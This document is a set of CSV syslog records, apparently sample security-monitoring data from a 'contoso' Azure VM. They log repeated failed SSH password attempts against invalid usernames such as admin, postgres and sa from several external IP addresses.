+15287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:55,UbuntuDevEnv,2019-06-26 05:23:55,auth,UbuntuDevEnv,info,Invalid user User from 196.41.208.238 port 31540,9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,196.41.208.2,31540,,
+15288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:55,UbuntuDevEnv,2019-06-26 05:23:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:55,UbuntuDevEnv,2019-06-26 05:23:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+15290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:57,UbuntuDevEnv,2019-06-26 05:23:57,auth,UbuntuDevEnv,info,Failed password for invalid user User from 196.41.208.238 port 31540 ssh2,9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,196.41.208.2,31540,,
+15291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:57,UbuntuDevEnv,2019-06-26 05:23:57,auth,UbuntuDevEnv,info,Disconnected from invalid user User 196.41.208.238 port 31540 [preauth],9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,196.41.208.2,31540,,
+15292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:57,UbuntuDevEnv,2019-06-26 05:23:57,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 31540:11: Bye Bye [preauth],9881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,31540,,
+15293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:25:16,UbuntuDevEnv,2019-06-26 05:25:16,auth,UbuntuDevEnv,info,Invalid user jules from 140.143.223.242 port 60254,10178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jules,140.143.223.2,60254,,
+15294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:25:16,UbuntuDevEnv,2019-06-26 05:25:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,10178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:25:16,UbuntuDevEnv,2019-06-26 05:25:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:25:19,UbuntuDevEnv,2019-06-26 05:25:18,auth,UbuntuDevEnv,info,Failed password for invalid user jules from 140.143.223.242 port 60254 ssh2,10178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jules,140.143.223.2,60254,,
+15297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:25:20,UbuntuDevEnv,2019-06-26 05:25:19,auth,UbuntuDevEnv,info,Disconnected from invalid user jules 140.143.223.242 port 60254 [preauth],10178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jules,140.143.223.2,60254,,
+15298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:25:20,UbuntuDevEnv,2019-06-26 05:25:19,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 60254:11: Bye Bye [preauth],10178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,60254,,
+15299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:32:09,UbuntuDevEnv,2019-06-26 05:32:08,auth,UbuntuDevEnv,info,Invalid user postgres from 140.143.223.242 port 49820,11694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,140.143.223.2,49820,,
+15300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:32:09,UbuntuDevEnv,2019-06-26 05:32:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,11694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:32:09,UbuntuDevEnv,2019-06-26 05:32:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:32:11,UbuntuDevEnv,2019-06-26 05:32:10,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 140.143.223.242 port 49820 ssh2,11694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,140.143.223.2,49820,,
+15303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:32:11,UbuntuDevEnv,2019-06-26 05:32:11,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 49820:11: Bye Bye [preauth],11694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,49820,,
+15304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:32:11,UbuntuDevEnv,2019-06-26 05:32:11,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 140.143.223.242 port 49820 [preauth],11694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,140.143.223.2,49820,,
+15305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:33:46,UbuntuDevEnv,2019-06-26 05:33:46,auth,UbuntuDevEnv,info,Invalid user henry from 45.55.190.46 port 47894,12015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,henry,45.55.190.4,47894,,
+15306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:33:46,UbuntuDevEnv,2019-06-26 05:33:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:33:46,UbuntuDevEnv,2019-06-26 05:33:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,12015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+15308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:33:48,UbuntuDevEnv,2019-06-26 05:33:47,auth,UbuntuDevEnv,info,Failed password for invalid user henry from 45.55.190.46 port 47894 ssh2,12015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,henry,45.55.190.4,47894,,
+15309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:33:50,UbuntuDevEnv,2019-06-26 05:33:50,auth,UbuntuDevEnv,info,Disconnected from invalid user henry 45.55.190.46 port 47894 [preauth],12015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,henry,45.55.190.4,47894,,
+15310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:33:50,UbuntuDevEnv,2019-06-26 05:33:50,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 47894:11: Bye Bye [preauth],12015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,47894,,
+15311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:34:10,UbuntuDevEnv,2019-06-26 05:34:10,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 44503,12135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,44503,,
+15312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:34:10,UbuntuDevEnv,2019-06-26 05:34:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:34:10,UbuntuDevEnv,2019-06-26 05:34:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,12135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+15314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:34:12,UbuntuDevEnv,2019-06-26 05:34:12,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 44503 ssh2,12135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,44503,,
+15315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:34:12,UbuntuDevEnv,2019-06-26 05:34:12,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 44503: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",12135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,44503,,
+15316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:34:17,UbuntuDevEnv,2019-06-26 05:34:17,auth,UbuntuDevEnv,info,Connection closed by 140.143.223.242 port 36928 [preauth],12163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,36928,,
+15317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:36:20,UbuntuDevEnv,2019-06-26 05:36:19,auth,UbuntuDevEnv,info,Invalid user tecnici from 140.143.223.242 port 52272,12602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tecnici,140.143.223.2,52272,,
+15318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:36:20,UbuntuDevEnv,2019-06-26 05:36:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,12602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:36:20,UbuntuDevEnv,2019-06-26 05:36:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:36:21,UbuntuDevEnv,2019-06-26 05:36:21,auth,UbuntuDevEnv,info,Failed password for invalid user tecnici from 140.143.223.242 port 52272 ssh2,12602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tecnici,140.143.223.2,52272,,
+15321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:36:21,UbuntuDevEnv,2019-06-26 05:36:21,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 52272:11: Bye Bye [preauth],12602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,52272,,
+15322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:36:21,UbuntuDevEnv,2019-06-26 05:36:21,auth,UbuntuDevEnv,info,Disconnected from invalid user tecnici 140.143.223.242 port 52272 [preauth],12602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tecnici,140.143.223.2,52272,,
+15323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:18,UbuntuDevEnv,2019-06-26 05:40:18,auth,UbuntuDevEnv,info,Invalid user sa from 140.143.223.242 port 54692,13446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,140.143.223.2,54692,,
+15324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:18,UbuntuDevEnv,2019-06-26 05:40:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,13446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:18,UbuntuDevEnv,2019-06-26 05:40:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:21,UbuntuDevEnv,2019-06-26 05:40:20,auth,UbuntuDevEnv,info,Failed password for invalid user sa from 140.143.223.242 port 54692 ssh2,13446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,140.143.223.2,54692,,
+15327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:21,UbuntuDevEnv,2019-06-26 05:40:21,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 54692:11: Bye Bye [preauth],13446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,54692,,
+15328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:21,UbuntuDevEnv,2019-06-26 05:40:21,auth,UbuntuDevEnv,info,Disconnected from invalid user sa 140.143.223.242 port 54692 [preauth],13446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,140.143.223.2,54692,,
+15329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:24,UbuntuDevEnv,2019-06-26 05:40:24,auth,UbuntuDevEnv,info,Invalid user eden from 106.12.27.140 port 30465,13466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,106.12.27.1,30465,,
+15330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:24,UbuntuDevEnv,2019-06-26 05:40:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:24,UbuntuDevEnv,2019-06-26 05:40:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,13466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:26,UbuntuDevEnv,2019-06-26 05:40:25,auth,UbuntuDevEnv,info,Failed password for invalid user eden from 106.12.27.140 port 30465 ssh2,13466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,106.12.27.1,30465,,
+15333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:26,UbuntuDevEnv,2019-06-26 05:40:26,auth,UbuntuDevEnv,info,Disconnected from invalid user eden 106.12.27.140 port 30465 [preauth],13466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,106.12.27.1,30465,,
+15334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:40:26,UbuntuDevEnv,2019-06-26 05:40:26,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 30465:11: Bye Bye [preauth],13466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,30465,,
+15335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:19,UbuntuDevEnv,2019-06-26 05:44:19,auth,UbuntuDevEnv,info,Invalid user shop from 140.143.223.242 port 57122,14302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shop,140.143.223.2,57122,,
+15336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:19,UbuntuDevEnv,2019-06-26 05:44:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,14302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:19,UbuntuDevEnv,2019-06-26 05:44:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:21,UbuntuDevEnv,2019-06-26 05:44:20,auth,UbuntuDevEnv,info,Failed password for invalid user shop from 140.143.223.242 port 57122 ssh2,14302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shop,140.143.223.2,57122,,
+15339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:21,UbuntuDevEnv,2019-06-26 05:44:21,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 57122:11: Bye Bye [preauth],14302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,57122,,
+15340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:21,UbuntuDevEnv,2019-06-26 05:44:21,auth,UbuntuDevEnv,info,Disconnected from invalid user shop 140.143.223.242 port 57122 [preauth],14302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shop,140.143.223.2,57122,,
+15341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:54,UbuntuDevEnv,2019-06-26 05:44:53,auth,UbuntuDevEnv,info,Invalid user yuanwd from 45.55.190.46 port 55284,14381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,45.55.190.4,55284,,
+15342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:54,UbuntuDevEnv,2019-06-26 05:44:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,14381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+15343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:54,UbuntuDevEnv,2019-06-26 05:44:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:55,UbuntuDevEnv,2019-06-26 05:44:55,auth,UbuntuDevEnv,info,Failed password for invalid user yuanwd from 45.55.190.46 port 55284 ssh2,14381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,45.55.190.4,55284,,
+15345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:58,UbuntuDevEnv,2019-06-26 05:44:57,auth,UbuntuDevEnv,info,Disconnected from invalid user yuanwd 45.55.190.46 port 55284 [preauth],14381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,45.55.190.4,55284,,
+15346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:44:58,UbuntuDevEnv,2019-06-26 05:44:57,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 55284:11: Bye Bye [preauth],14381,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,55284,,
